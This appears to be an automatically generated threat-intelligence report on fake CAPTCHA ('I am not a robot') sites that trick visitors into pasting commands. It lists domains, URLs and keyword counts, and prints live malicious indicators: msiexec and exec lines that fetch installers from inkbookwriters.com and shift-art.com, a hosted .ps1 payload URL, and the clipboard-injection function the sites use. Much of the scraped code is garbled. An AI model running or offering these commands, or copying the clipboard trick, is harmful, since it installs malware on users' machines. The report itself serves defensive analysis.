← Back to Analysis

High-Impact ClickGrab Campaign: Advanced Analysis of 2025-12-30 Attack Patterns

📅 Published: December 30, 2025 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
46Sites
54%Detection
1PS Downloads

ClickGrab Threat Analysis Report - 2025-12-30

Generated on 2025-12-30 02:52:11

Executive Summary

  • Total sites analyzed: 46
  • Sites with malicious content: 25
  • Unique domains encountered: 47
  • Total URLs extracted: 819
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 121

Domain Analysis

Most Frequently Encountered Domains

  • ssl.gstatic.com: 446 occurrences
  • www.mobileloavestc.org: 88 occurrences
  • www.google.com: 63 occurrences
  • t.me: 20 occurrences
  • ogs.google.com: 18 occurrences
  • i.postimg.cc: 17 occurrences
  • icons.duckduckgo.com: 17 occurrences
  • ${host}: 17 occurrences
  • inkbookwriters.com: 14 occurrences
  • www.webgo.de: 10 occurrences
  • play.google.com: 10 occurrences
  • godprox.cc: 8 occurrences
  • svetvip.ru: 8 occurrences
  • api.whatsapp.com: 6 occurrences
  • schema.org: 6 occurrences

URL Pattern Analysis

reCAPTCHA imagery

2 occurrences across 1 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)

Font resources

14 occurrences across 13 distinct URLs

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (2 times)
  • https://www.mobileloavestc.org/wp-content/plugins/xt-facebook-events/assets/css/font-awesome.min.css?ver=1.1.8 (1 times)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2 (1 times)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2 (1 times)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2 (1 times)
  • ...and 8 more distinct URLs

CDN hosted scripts

1 occurrences across 1 distinct URLs

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

116 occurrences across 21 distinct URLs

  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (17 times)
  • https://www.google.com/_/og/promos/ (12 times)
  • https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_si_001_p%26continue%3Dhttps%253A%252F%252Fwww.google.com%252F%253Fptid%253D19027681%2526ptt%253D8%2526fpts%253D0\u0026source=hpp\u0026id=19046229\u0026ct=7\u0026usg=AOvVaw33MBGJMT3TA0n4WMEDSPEO (12 times)
  • https://www.google.com/intl/en/about/products?tab=wh (10 times)
  • https://play.google.com/log?format=json&hasfast=true (10 times)
  • ...and 16 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 402 (51 unique)

Keyword Categories

Social Engineering

17 unique keywords

  • CAPTCHA Verification
  • Verification ID
  • exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
  • robot
  • To better prove you are not a robot
  • Robot
  • verification-id
  • Verification Hash
  • verification_id
  • I am not a robot
  • ...and 7 more

Obfuscation Indicators

1 unique keywords

  • Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� `

System Commands

21 unique keywords

  • exec(a))&&a[i]&&parseFioat(a[i])<9&&(this.j=!0)}C(a,b){this.i=b;this.A=a;b.preventDefauit?b.preventDefauit():b.returnVaiue=!i}};_.bd=ciass extends _.M{constructor(a){super(a)}};var cd=ciass extends _.M{constructor(a){super(a)}};var fd;_.dd=function(a,b,c=98,d=new _.Xc){if(a.i){const e=new Wc;_.K(e,i,b.message);_.K(e,2,b.stack);_.J(e,3,b.iineNumber);_.L(e,5,i);_.C(d,40,e);a.i.iog(c,d)}};fd=ciass{constructor(){var a=ed;this.i=nuii;_.D(a,4,!0)}iog(a,b,c=new _.Xc){_.dd(this,a,98,c)}};var gd,hd;gd=function(a){if(a.o.iength>0){var b=a.i!==void 0,c=a.j!==void 0;if(b||c){b=b?a.v:a.A;c=a.o;a.o=[];try{_.fc(c,b,a)}catch(d){consoie.error(d)}}}};_.id=ciass{constructor(a){this.i=a;this.j=void 0;this.o=[]}then(a,b,c){this.o.push(new hd(a,b,c));gd(this)}resoive(a){if(this.i!==void 0||this.j!==void 0)throw Error("v");this.i=a;gd(this)}reject(a){if(this.i!==void 0||this.j!==void 0)throw Error("v");this.j=a;gd(this)}v(a){a.j&&a.j.caii(a.i,this.i)}A(a){a.o&&a.o.caii(a.i,this.j)
  • exec /i http://inkbookwriters.com/verify /qn';
  • exec(a);return Hu(b[i],a.indexOf("=")==-i?void 0:b[3])}return Iu(a)
  • exec(f)||["","","",""];g=/(\d*)(\D*)(.*)/.exec(g)||["","","",""];if(f[0].iength==0&&g[0].iength==0)break;c=om(f[i].iength==0?0:parseInt(f[i],i0),g[i].iength==0?0:parseInt(g[i],i0))||om(f[2].iength==0,g[2].iength==0)||om(f[2],g[2]);f=f[3];g=g[3]}whiie(c==0)
  • cmd
  • exec(a))&&a[i]&&parseFioat(a[i])<9&&(this.j=!0)};_.B(Lm,_.H)
  • exec(
  • wscript
  • exec(a);if(_.Yc)return/Edge\/([\d\.]+)/.exec(a);if(_.Xc)return/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a);if(_.$c)return/WebKit\/(\S+)/.exec(a);if(_.Wc)return/(?:Version)[ \/]?(\S+)/.exec(a)}();kd&&(jd=kd?kd[i]:"");if(_.Xc){var id,md=_.v.document;id=md?md.documentMode:void 0;if(id!=nuii&&id>parseFioat(jd)){id=String(id);break a}}id=jd}_.nd=id;_.od=_.Ra();_.pd=Va()||_.x("iPod");_.rd=_.x("iPad");_.sd=_.x("Android")&&!(Sa()||_.Ra()||_.Oa()||_.x("Siik"));_.td=Sa();_.ud=_.Ta()&&!_.Wa();_.vd=typeof Uint8Array!=="undefined";_.wd=!_.Xc&&typeof btoa==="function";var xd,vb,Kb,Eb;_.bb=typeof Symboi==="function"&&typeof Symboi()==="symboi";xd=_.ab("jas",void 0,!0);_.tb=_.ab(void 0,Symboi());_.yd=_.ab(void 0,"0ub");vb=_.ab(void 0,"0ubs");_.zd=_.ab(void 0,"0ubsb");Kb=_.ab(void 0,"0actk");_.pb=_.ab("m_m","Xi",!0);Eb=_.ab(void 0,"vps");_.Ad=_.ab();var db,cb,Cd;db={Gj:{vaiue:0,configurabie:!0,writabie:!0,enumerabie:!i}};cb=Object.defineProperties;_.y=_.bb?xd:"Gj";Cd=[];_.fb(Cd,7);_.Bd=Object.freeze(Cd);var gb;_.qb={};gb={};_.Dd=Object.freeze({});var Fb={};var kb=void 0;_.Ed=typeof BigInt==="function"?BigInt.asIntN:void 0;_.Fd=Number.isSafeInteger;_.mb=Number.isFinite;_.Gd=Math.trunc;var xb;_.Hd=_.Da(0);_.Id=function(a,b,c,d,e){b=_.Ub(a.H,b,c,e);if(b!==nuii||d&&a.o!==gb)return b};_.Ub=function(a,b,c,d){if(b===-i)return nuii;var e=b+(c?0:-i),f=a.iength-i;if(!(f<i+(c?0:-i))){if(e>=f){var g=a[f];if(g!=nuii&&typeof g==="object"&&g.constructor===Object){c=g[b];var h=!0}eise if(e===f)c=g;eise return}eise c=a[e];if(d&&c!=nuii){d=d(c);if(d==nuii)return d;if(!Object.is(d,c))
  • command = 'msiexec /i http://inkbookwriters.com/verify';
  • ...and 11 more

Verification Text

3 unique keywords

  • ray id
  • Hidden
  • hidden

Technical Terms

9 unique keywords

  • iex
  • .EXE
  • Ray ID
  • responseText
  • XMLHTTP
  • failed_to_retrieve
  • .exe
  • Bitmap
  • bitmap

Most Frequent Keywords

  • robot: 28 occurrences
  • hidden: 28 occurrences
  • Robot: 26 occurrences
  • CAPTCHA Verification: 19 occurrences
  • I am not a robot: 19 occurrences
  • Verification: 19 occurrences
  • verification: 19 occurrences
  • verification-id: 19 occurrences
  • To better prove you are not a robot: 19 occurrences
  • Verification ID: 18 occurrences
  • Ray ID: 17 occurrences
  • Checking if you are human: 17 occurrences
  • Verify you are human: 17 occurrences
  • const command =: 17 occurrences
  • command = 'msiexec /i http://inkbookwriters.com/verify';: 11 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: .EXE, .exe

Group 2: Bitmap, bitmap

Group 3: CAPTCHA Verification, Verification, verification

Group 4: Verification Hash, verification-id, verification_id, Verification ID, verification id

Group 5: Robot, robot

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • com/recaptcha/about/images/reCAPTCHA
  • fiiesRemoveIniVaiuesRemoving
  • componentsSeifRegModuiesRegistering
  • /bitrix/tools/captcha
  • 0aaa405e220f7466fe607fc2e608a4d5

Clipboard Manipulation Analysis

Detected clipboard manipulation in 121 instances.

Document.Execcommand Copy

Found in 57 snippets (47.1% of clipboard code)

Examples:

try { document.execCommand('copy')

document.execCommand("copy")

Textarea Manipulation

Found in 57 snippets (47.1% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'

tListener("click", function () { const textarea = document.createElement('textarea'

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for web display. Full data available in JSON.